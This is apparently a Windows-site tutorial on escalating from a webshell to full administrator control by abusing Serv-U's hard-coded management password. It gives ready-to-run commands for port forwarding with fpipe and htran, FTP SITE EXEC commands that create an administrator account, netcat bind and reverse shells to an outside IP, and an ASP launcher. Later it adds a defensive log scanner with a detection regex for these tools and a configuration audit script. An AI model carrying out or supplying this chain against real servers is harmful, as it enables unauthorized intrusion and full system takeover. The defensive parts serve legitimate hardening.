Webshell and Serv-u combined to obtain the highest authority of the system

  
Serv-U listens by default on 127.0.0.1:43958, so the management port can only be connected to from the machine itself. The default management account is LocalAdministrator and the default password is "#l@$ak#.lk;0@P"; this password is hard-coded. Run fpipe -v -l 12345 -r 43958 127.0.0.1 on the target machine, then on your own machine use "Serv-U Administrator" to create a new SERVER with IP: target IP, Port: 12345, User: LocalAdministrator, Pass: "#l@$ak#.lk;0@P". The target machine's Serv-U is then yours to manage.

Prerequisite: a shell on the target machine with ordinary privileges. You do not need to be able to log in to the terminal or the physical console; as long as you have a shell from which a port-forwarding program can be run, this works. The shell can come from a webshell obtained through SQL injection, or from a webshell uploaded directly through the upload vulnerability in versions below 7.0 SP2.

Concrete implementation method

1. Use the webshell you obtained to upload the redirector fpipe, then execute fpipe -v -l 12345 -r 43958 127.0.0.1.
2. On your own machine, use "Serv-U Administrator" to create a new SERVER and fill in IP: target IP, Port: 12345, User: LocalAdministrator, Pass: "#l@$ak#.lk;0@P". You can now manage this server's Serv-U. Create a new account of type System Administrator and give it "execute" permission under the "Dir access" option.
3. Connect with ftp and execute:
   quote site exec net user iisuser password /add
   This adds a user named iisuser with the password "password". Add it to the administrators group:
   quote site exec net localgroup administrators iisuser /add
   Now you can connect to the terminal service and log in. You can of course do other things as well, such as uploading an nc.exe and getting a shell with administrator privileges on the target machine, either forward or reverse.

Forward connection: connect with ftp and execute
   quote site exec nc.exe -l -p 23 -t -e cmd.exe
At this point the target host becomes a telnet server, and you can telnet to port 23 of the target.

Reverse connection: suppose your IP is 202.96.209.168.
1. On your own machine (it must have an external IP) run: nc -vv -lp 99
2. On the target machine run: nc -e cmd.exe 202.96.209.168 99
On your machine you get a shell with administrator privileges on the target machine.

If the other side filters ports or has a firewall (this kind of protection does not restrict bounce connections; if it did, another method would be needed), TCP socket forwarding can be used instead. For example: my machine is A; the machine I want to test is B, which does not allow inbound connections; I already have a shell on B (guest privileges are enough). How do we reach B's 43958?
I. On A, listen on two ports, 23 and 56: 23 waits for B to connect in, 56 waits for me to connect.
II. B connects out to the port 23 I am listening on, and that connection is forwarded to B's local 43958. Built this way, the other side's firewall cannot stop us.
Now run Serv-U locally on A and create a new SERVER with IP 127.0.0.1, port 56, user LocalAdministrator, password #l@$ak#.lk;0@P.

Concrete implementation method
Suppose your IP is 202.96.209.168.
1. On your own machine run: htran.exe -listen 23 56
2. Run Serv-U locally and create a new SERVER with IP 127.0.0.1, port 56, username LocalAdministrator, password #l@$ak#.lk;0@P.
3. On the target machine run: htran.exe -slave 127.0.0.1 43958 202.96.209.168 23
If it cannot be run directly from the webshell, you can write an ASP script to execute it, as follows (connect.asp):

   <%
   Set oScript = Server.CreateObject("WSCRIPT.SHELL")
   oScript.Run (Server.MapPath("htran") & " -slave 127.0.0.1 43958 202.96.209.168 23 ")
   %>

Open http://destination URL/connect.asp. If it comes back blank, there was no error, and you should now be able to manage the target server's Serv-U; the rest is up to you. htran.exe is a multi-threaded packet forwarding tool that can be downloaded from Red Alliance.
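From the defender's side, the step that turns FTP access into an administrator account is the SITE EXEC command, which only works for accounts given "execute" permission. The following is an added example, not part of the original article, that scans FTP command log lines and flags every SITE EXEC invocation, raising the severity when the executed command is an account-management tool, a command interpreter or one of the forwarders named above. The log lines and their "date time user command" layout are constructed for illustration; Serv-U's real log format differs, so the line splitter is an assumption to adapt.

```python
import re

# Constructed sample lines. The "date time user command" layout is an
# assumption for this example, not Serv-U's actual log format.
SAMPLE_LOG = """\
2004-01-01 10:00:01 anonymous USER anonymous
2004-01-01 10:00:02 anonymous CWD /pub
2004-01-01 10:05:10 ftpadmin SITE EXEC net user iisuser password /add
2004-01-01 10:05:12 ftpadmin SITE EXEC net localgroup administrators iisuser /add
2004-01-01 10:07:00 ftpadmin SITE EXEC nc.exe -l -p 23 -t -e cmd.exe
2004-01-01 10:07:30 ftpadmin SITE EXEC dir
2004-01-01 10:08:00 backup STOR report.zip
"""

# Any SITE EXEC is worth a look; these command names make it critical.
SITE_EXEC = re.compile(r"\bSITE\s+EXEC\b\s*(?P<cmd>.*)$", re.IGNORECASE)
HIGH_RISK = re.compile(
    r"\b(net\s+user|net\s+localgroup|cmd\.exe|nc(\.exe)?|fpipe|htran)\b",
    re.IGNORECASE,
)


def classify(command: str):
    """Return 'critical', 'warning' or None for one FTP command string."""
    m = SITE_EXEC.search(command)
    if not m:
        return None
    return "critical" if HIGH_RISK.search(m.group("cmd")) else "warning"


def scan(log_text: str):
    """Return (severity, user, command) for every flagged log line."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        # Assumed layout: date, time, user, then the raw FTP command.
        _date, _time, user, command = line.split(" ", 3)
        severity = classify(command)
        if severity:
            hits.append((severity, user, command))
    return hits


if __name__ == "__main__":
    for severity, user, command in scan(SAMPLE_LOG):
        print(f"{severity.upper():8} {user:10} {command}")
```

Run against the sample, the three commands from the chain above come out as critical and the harmless "SITE EXEC dir" as a warning; the warning tier exists because no ordinary FTP user should be issuing SITE EXEC at all.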
Prevention method
Patch Serv-U and change the default port and management password. To change the password, modify the two files ServUAdmin.exe and ServUDaemon.exe. To change the port, it is enough to add LocalSetupPortNo=12345 under the [GLOBAL] option in the ServUDaemon.ini file. Unfortunately the latest version, Serv-U 5.2.0.0, is still affected: nothing has changed, and the default management port and password are still the original ones.
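As an added example (not from the article), here is a small Python audit of the port change just described: it reads the [GLOBAL] section of ServUDaemon.ini, reports whether LocalSetupPortNo still leaves the management port at the default 43958, and can probe whether a port is accepting connections on the local host. It assumes the file is plain INI text that configparser can read; the two configurations shown are constructed, the hardened one containing the LocalSetupPortNo=12345 line from the text. Moving the port only relocates the interface; the hard-coded password is still there until ServUAdmin.exe and ServUDaemon.exe are modified as described.

```python
import configparser
import socket

DEFAULT_ADMIN_PORT = 43958        # Serv-U's default local management port
PORT_KEY = "LocalSetupPortNo"     # [GLOBAL] key that overrides the port

# Constructed sample configurations (only the keys relevant here).
INI_UNCHANGED = """[GLOBAL]
Version=5.2.0.0
"""
INI_HARDENED = """[GLOBAL]
Version=5.2.0.0
LocalSetupPortNo=12345
"""


def admin_port(ini_text: str) -> int:
    """Management port that this ServUDaemon.ini text configures."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.optionxform = str            # keep key case exactly as written
    parser.read_string(ini_text)
    if parser.has_option("GLOBAL", PORT_KEY):
        return int(parser.get("GLOBAL", PORT_KEY))
    return DEFAULT_ADMIN_PORT           # key absent: Serv-U falls back to default


def audit(ini_text: str) -> dict:
    """Summarise the management-port finding for one configuration."""
    port = admin_port(ini_text)
    finding = None
    if port == DEFAULT_ADMIN_PORT:
        finding = (f"{PORT_KEY} absent or left at {DEFAULT_ADMIN_PORT}: "
                   f"add {PORT_KEY}=<non-default port> under [GLOBAL]")
    return {"admin_port": port, "finding": finding}


def port_accepts_connections(host: str, port: int, timeout: float = 1.0) -> bool:
    """True if something on host is accepting TCP connections on port."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


if __name__ == "__main__":
    for name, text in (("unchanged", INI_UNCHANGED), ("hardened", INI_HARDENED)):
        print(name, audit(text))
    # On a real Serv-U host, read the actual ServUDaemon.ini instead and
    # then confirm whether the configured port is really the one listening.
    print("127.0.0.1:43958 accepting connections:",
          port_accepts_connections("127.0.0.1", DEFAULT_ADMIN_PORT))
```

Pair the file check with the socket probe: the INI says what the daemon should be doing, the probe shows what is actually listening after a restart.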

Copyright © Windows knowledge All Rights Reserved